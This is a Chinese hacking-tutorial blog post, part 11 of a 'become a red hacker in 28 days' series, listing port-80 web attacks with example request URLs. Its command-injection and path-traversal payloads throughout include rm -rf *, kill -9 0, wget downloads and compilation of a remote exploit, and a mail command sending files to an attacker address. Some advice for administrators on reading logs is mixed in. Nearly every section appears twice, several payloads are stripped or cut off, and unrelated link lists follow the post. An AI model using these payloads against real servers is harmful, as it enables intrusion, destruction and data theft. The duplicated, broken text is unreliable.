28天打造专业红客(十一)
2024-05-26 09:17:21
[第11天]80端口***总结
今天我们来说说80端口的***方法,只是把大概的说一下,肯定有遗漏了.
我将描述每种***的作用,和其怎样利用这些漏洞进行***(注意host的意思你应该懂吧)
(1)'.' '..' 和 '...' 请求
这些***痕迹是非常普遍的用于web应用程序和web服务器,它用于允许***者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的CGI程序漏洞含有这些'..'请求。
Example:
[url]http://host/cgi-bin/lame.cgi?file=../../../../etc/motd[/url]
这个列子展示了***者请求mosd这个文件,如果***者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。
这些***痕迹是非常普遍的用于web应用程序和web服务器,它用于允许***者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的CGI程序漏洞含有这些'..'请求。
Example:
[url]http://host/cgi-bin/lame.cgi?file=../../../../etc/motd[/url]
这个列子展示了***者请求mosd这个文件,如果***者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。
(2)'%20' 请求
%20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。
Example:
[url]http://host/cgi-bin/lame.cgi?page=ls%20-al[/url]|
这个列子展示了***者执行了一个unix的命令,列出请求的整个目录的文件,导致***者访问你系统中重要的文件,帮助他进一步取得特权提供条件。
%20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。
Example:
[url]http://host/cgi-bin/lame.cgi?page=ls%20-al[/url]|
这个列子展示了***者执行了一个unix的命令,列出请求的整个目录的文件,导致***者访问你系统中重要的文件,帮助他进一步取得特权提供条件。
(3)'%00' 请求
%00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。
Examples:
[url]http://host/cgi-bin/lame.cgi?page=index.html[/url]
这可能是个有效的请求在这个机子上,如果***者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。
[url]http://host/cgi-bin/lame.cgi?page=../../../../etc/motd[/url]
也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时候它会告诉***者请求的文件必须是一某个字符后缀的文件类型,这样,***者可以获得系统的路径,文件名,导致在你的系统获得更多的敏感信息
[url]http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html[/url]
注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类型,一些应用程序由于愚蠢的检查有效的请求文件,这是我们常用的方法。
%00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。
Examples:
[url]http://host/cgi-bin/lame.cgi?page=index.html[/url]
这可能是个有效的请求在这个机子上,如果***者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。
[url]http://host/cgi-bin/lame.cgi?page=../../../../etc/motd[/url]
也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时候它会告诉***者请求的文件必须是一某个字符后缀的文件类型,这样,***者可以获得系统的路径,文件名,导致在你的系统获得更多的敏感信息
[url]http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html[/url]
注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类型,一些应用程序由于愚蠢的检查有效的请求文件,这是我们常用的方法。
(4)'|' 请求
这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。
Example:
# cat access_log| grep -i '..'
(这个命令将显示日志中的“..“请求,常用于发现我们和蠕虫***)
常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警。
在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在***检测系统中。
下面给出一些列子:
[url]http://host/cgi-bin/lame.cgi?page=../../../../bin/ls[/url]|
这个请求命令执行,下面是一些变化的列子
[url]http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc[/url]|
这个请求在unix系统中列出/etc目录的所有文件
[url]http://host/cgi-bin/lame.cgi?page=cat%20access_log[/url]|grep%20-i%20'lame'
这个请求cat命令的执行并且grep命令也将执行,查询出”lame'
这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。
Example:
# cat access_log| grep -i '..'
(这个命令将显示日志中的“..“请求,常用于发现我们和蠕虫***)
常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警。
在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在***检测系统中。
下面给出一些列子:
[url]http://host/cgi-bin/lame.cgi?page=../../../../bin/ls[/url]|
这个请求命令执行,下面是一些变化的列子
[url]http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc[/url]|
这个请求在unix系统中列出/etc目录的所有文件
[url]http://host/cgi-bin/lame.cgi?page=cat%20access_log[/url]|grep%20-i%20'lame'
这个请求cat命令的执行并且grep命令也将执行,查询出”lame'
(5)';' 请求
在unix系统,这个字符允许多个命令在一行执行
Example:
# id;uname -a
(执行id命令后,紧跟着执行uname命令)
一些web程序用这个字符,可能导致在IDS日志中失败的警告,应该仔细的检查web程序,让IDS警报失败的几率降低
(6)'<' 和 '>' 请求
应该检查你的日志记录中这两个字符,众多的原因中,首要的一个是这个字符表明了添加数据在文件中
Example 1:
# echo 'your hax0red h0 h0' >> /etc/motd (请求写信息在motd这个文件中)
一个***者可以容易的用象上面的这个请求篡改你的web页面。比如著名的RDS exploit常被***者用于更改web主页面。
Example 2:
[url]http://host/something.php=Hi%20mom%20Im%20Bold[/url]!
你会注意到这里html语言的标志,同样用了“〈”,“〉”字符,这种***不能导致***者对系统进行访问,它迷惑人们认为这是个合法的信息在web站点中(导致人们在访问这个联结的时候访问到***者设定的地址,这种请求可能会被转变成16进制的编码字符形式,使***的痕迹不那么明显)
(7)'!'请求
这种字符请求常用语对SS(Server Side Include) I进行***,如果***者迷惑用户点击被***者设定的联结,和上面的一样。
Example:
[url]http://host1/something.php[/url]=
这个列子是***者可能会做的,它让一个host2站点上的文件看起来是来自于 host1上面的(当然,需要访问者访问这个被***者设定的联结。这种请求可能被转化成16进制的编码伪装,不易发现)
这种字符请求常用语对SS(Server Side Include) I进行***,如果***者迷惑用户点击被***者设定的联结,和上面的一样。
Example:
[url]http://host1/something.php[/url]=
这个列子是***者可能会做的,它让一个host2站点上的文件看起来是来自于 host1上面的(当然,需要访问者访问这个被***者设定的联结。这种请求可能被转化成16进制的编码伪装,不易发现)
同时,这种方式也可以以web站点的权限执行命令
Example:
[url]http://host/something.php[/url]=
这个列子在远程的系统上执行“id'的命令,它将显示这个web站点用户的id,通常是”nobody'或者“www'
Example:
[url]http://host/something.php[/url]=
这个列子在远程的系统上执行“id'的命令,它将显示这个web站点用户的id,通常是”nobody'或者“www'
这种形式也允许包含隐藏文件。
Example:
[url]http://host/something.php[/url]=
这个隐藏文件.htpasswd不会被显示出来,Apache建立的规则会拒绝这种以.ht 形式的请求,而SSI标志会绕过这种限制,并导致安全问题
Example:
[url]http://host/something.php[/url]=
这个隐藏文件.htpasswd不会被显示出来,Apache建立的规则会拒绝这种以.ht 形式的请求,而SSI标志会绕过这种限制,并导致安全问题
(8)' 这种***用于试图在远程的web应用程序中插入PHP程序,它可能允许执行命令,这取决于服务器的设置,和其他起作用的一些因素(比如php设置为安全模式)
Example: [url]http://host/something.php[/url]=
在某些简单的php应用程序中,它可能会在远程系统上以web站点用户的权限执行本地命令
(9)'`' 请求
这种字符后面常用在perl中执行命令,这个字符在web应用程序中不是经常的使用,所以,如果看到它在你的日志中,应该非常小心
Example:
[url]http://host/something.cgi=[/url]`id`
一个perl写的有问题的cgi程序,会导致执行id命令
下面是针对管理员说的,因为现在很多网管都在看这个,所以我觉得有必要写一点,当然也是让你知道你的对手有哪些着数了,呵呵.我只是罗列了一些***后的痕迹,当然不能罗列所有了
'/bin/ls'
这个命令请求整个路径,在很多的web应用程序中都有这个漏洞,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。再一次提醒,写好的web应用程序(cgi,asp,php...etc)是安全的基础
这个命令请求整个路径,在很多的web应用程序中都有这个漏洞,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。再一次提醒,写好的web应用程序(cgi,asp,php...etc)是安全的基础
Example:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al[/url]|
[url]http://host/cgi-bin/bad.cgi?doh=ls%20-al[/url];
[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al[/url]|
[url]http://host/cgi-bin/bad.cgi?doh=ls%20-al[/url];
'cmd.exe'
这是一个windows的shell,一个***者如果访问并运行这个脚本,在服务器设置允许的条件下可以在windows机器上做任何事情,很多的蠕虫病毒就是通过80端口,传播到远程的机器上
[url]http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e[/url]:
这是一个windows的shell,一个***者如果访问并运行这个脚本,在服务器设置允许的条件下可以在windows机器上做任何事情,很多的蠕虫病毒就是通过80端口,传播到远程的机器上
[url]http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e[/url]:
'/bin/id'
这是个2进制的文件,它的问题和/bin/ls一样,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。
它将显示属于哪个用户和属于哪个组
Example:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/id[/url]|
[url]http://host/cgi-bin/bad.cgi?doh=id[/url];
这是个2进制的文件,它的问题和/bin/ls一样,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。
它将显示属于哪个用户和属于哪个组
Example:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/id[/url]|
[url]http://host/cgi-bin/bad.cgi?doh=id[/url];
'/bin/rm'
这个命令可以删除文件,如果不正确的使用是非常危险的
Examples:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20[/url]*|
[url]http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20[/url]*;
这个命令可以删除文件,如果不正确的使用是非常危险的
Examples:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20[/url]*|
[url]http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20[/url]*;
'wget and tftp' 命令
这些命令常被***者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
Examples:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c[/url]| [url]http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c[/url];
这些命令常被***者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
Examples:
[url]http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c[/url]| [url]http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c[/url];
'cat' 命令
这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd[/url]| [url]http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd[/url];
这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd[/url]| [url]http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd[/url];
'echo' 命令
这个命令常用于写数据到文件中,比如“index.html”
Examples: >%200day.txt">[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20[/url]'fc-#kiwis%20was%20here'%20>>%200day.txt| >%200day.txt">[url]http://host/cgi-bin/bad.cgi?doh=echo%20[/url]'fc-#kiwis%20was%20here'%20>>%200day.txt;
这个命令常用于写数据到文件中,比如“index.html”
Examples: >%200day.txt">[url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20[/url]'fc-#kiwis%20was%20here'%20>>%200day.txt| >%200day.txt">[url]http://host/cgi-bin/bad.cgi?doh=echo%20[/url]'fc-#kiwis%20was%20here'%20>>%200day.txt;
'ps' 命令
列出当前运行的进程,告诉***者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux[/url]| [url]http://host/cgi-bin/bad.cgi?doh=ps%20-aux[/url];
列出当前运行的进程,告诉***者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux[/url]| [url]http://host/cgi-bin/bad.cgi?doh=ps%20-aux[/url];
'kill and killall' 命令
在unix系统这个命令用于杀掉进程,一个***者可以用这个命令来停止系统服务和程序,同时可以擦掉***者的痕迹,一些exploit会产生很多的子进程
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200[/url]| [url]http://host/cgi-bin/bad.cgi?doh=kill%20-9%200[/url];
在unix系统这个命令用于杀掉进程,一个***者可以用这个命令来停止系统服务和程序,同时可以擦掉***者的痕迹,一些exploit会产生很多的子进程
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200[/url]| [url]http://host/cgi-bin/bad.cgi?doh=kill%20-9%200[/url];
'uname' 命令
这个命令告诉***者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是***者曾今访问过的。通常uname -a来请求,这些都将记录在日志文件中
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a[/url]| [url]http://host/cgi-bin/bad.cgi?doh=uname%20-a[/url];
这个命令告诉***者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是***者曾今访问过的。通常uname -a来请求,这些都将记录在日志文件中
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a[/url]| [url]http://host/cgi-bin/bad.cgi?doh=uname%20-a[/url];
'cc, gcc, perl, python, etc...' 编译/解释命令
***者通过wget或者tftp下载exploit,并用cc,gcc这样的编译程序进行编译成可执行程序,进一步获得特权
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c[/url]| [url]http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337[/url];
如果你查看日志中发现有“perl” python”这些说明可能***者下载远程的perl ,python脚本程序,并试图本地获得特权
'mail' 命令
***者通常用这个命令将系统的一些重要文件发到***者自己的信箱,也肯能是进行邮件×××的***
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@[/url]****cnhonker.org%20<
***者通过wget或者tftp下载exploit,并用cc,gcc这样的编译程序进行编译成可执行程序,进一步获得特权
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c[/url]| [url]http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337[/url];
如果你查看日志中发现有“perl” python”这些说明可能***者下载远程的perl ,python脚本程序,并试图本地获得特权
'mail' 命令
***者通常用这个命令将系统的一些重要文件发到***者自己的信箱,也肯能是进行邮件×××的***
Examples: [url]http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@[/url]****cnhonker.org%20<
转载于:https://blog.51cto.com/zhouhaipeng/105448
28天打造专业红客(十一)相关推荐
- 28天打造专业红客(一)
何谓"***" ***是英文"HACKER"的音译.动词原形为"HACK",意为"劈"."砍".英文 ...
- 28天打造专业红客(四)
[第4天]从简单的网络命令讲起 昨天的帖子发表后,很多朋友问了很多问题,我发现很多朋友对基本的网络命令还很生疏,请你看这个帖子,里面讲的很详细的[url]http://www.91one.net/dv ...
- 30天打造专业红客七
30天打造专业红客 『第27天』深入对iis写权限的利用 大家可能看过<远程分析IIS设置>,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用<远程分析I ...
- 30天打造专业红客二
30天打造专业红客 [第5天]从简单的网络命令讲起 有个朋友问了我个问题:端口映射是什么意思?? 其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机 ...
- 30天打造专业红客四
30天打造专业红客 『第12天』从ipc$ 连接失败讲起 我们最好先来看一下什么是ipc¥连接.ipc(internet process connection)是远程网络连接.而ipc$,admi ...
- 30天打造专业红客八
相关知识 全国IP 全国IP,从追捕中找的 010.179.000.000__010.183.255.255__甘肃____ 010.184.000.000__010.188.255.255__ ...
- 打造专业人才发展链条:基于任职资格的专业人才发展与认证体系
打造专业人才发展链条:基于任职资格的专业人才发展与认证体系 https://www.toutiao.com/i6925819144583561731/?tt_from=weixin&utm_c ...
- viewpager 自定义翻页效果_轻松打造专业的录音棚效果,连网红用了都说好的唱吧声卡K10套装...
不得不说,近几年来的网红文化的盛行,随着智能手机的普及,我们在不知不觉中,已经步入了这个人人都是自媒体的时代,而短视频以及直播APP的风行,已经让更多普通人迷上了直播为生活带来的无限乐趣.可能,就是在 ...
- 青云QingCloud携手伟仕佳杰打造专业企业级云服务
3月8日,企业级基础云服务商青云QingCloud(qingcloud.com)宣布与亚太区最大的科技产品解决方案与供应链服务平台伟仕佳杰达成战略合作,共同推进青云QingCloud的产品与服务在亚太 ...
最新文章
- for死循环、怪异字符串、两次return……Python冷知识(三)
- 使用Apache下poi创建和读取excel文件
- max hit in personalization - CRM My Opportunity搜索的实现
- python spider怎么用_python爬虫入门(七)Scrapy框架之Spider类
- win7电脑内存信息的查看方法
- partial is not defined的解决办法
- 开课吧课堂:C++基本数据类型详解
- Ubuntu安装:解决Unable to locate package *** 问题
- (省赛系列——团队第三场)
- c语言开发的烟花表白程序,C语言实战之浪漫烟花表白程序(2020年十二月整理).doc...
- Java课程设计- 记事本代码
- addr2line的使用
- (Java实现) 工作分配问题
- QQ会员等级升级加速正式开始
- 巧妙理解动态规划算法
- MySQL中登录报错_mysql登录报错 ERROR 1045 (28000)
- python-pdf的去水印操作
- android中转换content://media/external/images/media/539163为/storage/emulated/0/DCIM/Camera/IMG_20160807_
- java 获取路由器mac_求好人帮助,如何用java语言获取像无线路由器上的MAC地址,我会重赏...
- sourceTree 完全卸载